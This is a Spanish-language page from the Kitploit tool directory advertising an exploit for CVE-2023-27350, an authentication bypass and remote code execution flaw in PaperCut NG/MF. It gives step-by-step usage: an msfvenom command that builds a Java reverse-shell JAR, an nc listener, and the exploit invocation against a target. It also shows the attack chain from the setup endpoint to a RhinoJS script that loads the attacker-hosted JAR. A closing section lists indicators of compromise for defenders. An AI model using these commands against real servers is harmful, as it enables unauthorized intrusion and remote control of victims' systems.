Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PaperCut-Authentication_Bypass_and_RCE — Este exploit se basa en CVE-2023-27350 y fue construido sobre el exploit original de horizon3ai y el módulo Metasploit. | Kitploit
Herramientas/GitHubGitHub/joaoaugustom/papercut-authentication_bypass_and_rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHub
joaoaugustom/papercut-authentication_bypass_and_rce

PaperCut-Authentication_Bypass_and_RCE

Este exploit se basa en CVE-2023-27350 y fue construido sobre el exploit original de horizon3ai y el módulo Metasploit.

Ver Repositorio
2hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-27350 — Omisión de Autenticación y RCE en PaperCut NG/MF

Exploit independiente en Python para la vulnerabilidad crítica de omisión de autenticación y ejecución remota de código en PaperCut NG/MF. CVSS 9.8.

Descripción

CVE-2023-27350 afecta a PaperCut NG y MF en versiones anteriores a 20.1.7, 21.2.11 y 22.0.9. La falla permite a un atacante no autenticado acceder al endpoint /app?service=page/SetupCompleted — una página de configuración diseñada para ser accesible solo durante la instalación inicial — y obtener una sesión administrativa válida sin ninguna credencial.

Con acceso de administrador, el atacante puede habilitar el mecanismo de scripting de impresión de PaperCut e inyectar código arbitrario ejecutado por la JVM del servidor, resultando en RCE completa en el contexto del usuario del servicio.

Versiones Afectadas

RamaVersión Corregida
20.x20.1.7
21.x21.2.11
22.x22.0.9

Las versiones 18.x y anteriores no recibieron parche oficial.

Implementaciones de Referencia

Este exploit fue desarrollado a partir del análisis de dos implementaciones públicas:

1. horizon3ai/CVE-2023-27350 (Python)

  • Repositorio: https://github.com/horizon3ai/CVE-2023-27350
  • Enfoque: usa Runtime.exec() con una cadena simple para ejecutar comandos
  • Limitaciones: Runtime.exec(String) no procesa metacaracteres de shell (>&, |, 0>&1), lo que hace que los payloads de reverse shell sean inefectivos. El script también codifica el ID de impresora (l1001) y verifica cadenas de éxito solo en inglés, fallando en instancias que no son en inglés.
  • Suposición incorrecta del motor: no tiene en cuenta que PaperCut usa RhinoJS (no BeanShell), lo que causa errores de sintaxis en ciertos payloads de Java.

2. rapid7/metasploit-framework — Omisión de Autenticación de PaperCutNG

  • Módulo: exploit/multi/http/papercut_ng_rce
  • Enfoque: carga un JAR de Metasploit en la JVM a través de URLClassLoader, evitando cualquier dependencia de shell.
  • Limitaciones: requiere el Metasploit Framework completo y genera un payload Java/Meterpreter; no se adapta fácilmente para uso independiente con nc.

Requisitos

root@kitploit:~
Python 3.x
requests
msfvenom (parte de Metasploit Framework)
nc (netcat)
root@kitploit:~
pip install requests

Uso

1. Generar el payload JAR

root@kitploit:~
msfvenom -p java/shell_reverse_tcp \
  LHOST=<TU_IP> LPORT=<PUERTO_SHELL> \
  -f jar -o payload.jar

2. Iniciar un listener

root@kitploit:~
nc -lvnp <PUERTO_SHELL>

3. Ejecutar el exploit

root@kitploit:~
python exploit.py \
  -u http://<OBJETIVO>:9191 \
  -j payload.jar \
  -lh <TU_IP> \
  -lp <PUERTO_HTTP> \
  -rp <PUERTO_SHELL>

Ejemplo:

root@kitploit:~
python exploit.py \
  -u http://192.168.1.100:9191 \
  -j payload.jar \
  -lh 192.168.1.10 \
  -lp 9090 \
  -rp 4444

Parámetros

ParámetroDescripciónPor Defecto
-u / --urlURL base de PaperCutrequerido
-j / --jarRuta a payload.jarrequerido
-lh / --lhostTu IP (el objetivo se conectará aquí)requerido
-lp / --lportPuerto HTTP para servir el JAR9090
-rp / --rportPuerto de reverse shell4444

Cómo Funciona

root@kitploit:~
1. Omisión de autenticación vía /app?service=page/SetupCompleted
        ↓
2. Obtener JSESSIONID de admin sin credenciales
        ↓
3. Seleccionar [Template Printer] (l1001)
        ↓
4. Inyectar script RhinoJS en el campo de script de impresión
        ↓
5. El script crea un URLClassLoader apuntando a nuestro servidor HTTP
        ↓
6. La JVM de PaperCut descarga y ejecuta payload.jar
        ↓
7. Reverse shell

Indicadores de Compromiso (IoC)

  • Acceso a /app?service=page/SetupCompleted sin una sesión previa
  • Modificación de los ajustes print-and-device.script.enabled y print.script.sandboxed (versiones >= 19)
  • Conexión HTTP saliente desde el servidor PaperCut a una IP externa
  • Instanciación de URLClassLoader con una URL externa en los registros de la JVM

Aviso Legal

Este exploit se proporciona con fines educativos y solo para uso autorizado (pruebas de penetración, CTF, entornos de laboratorio). El uso no autorizado contra sistemas sin permiso explícito es ilegal. El autor no se responsabiliza por ningún mal uso.

Descargar herramienta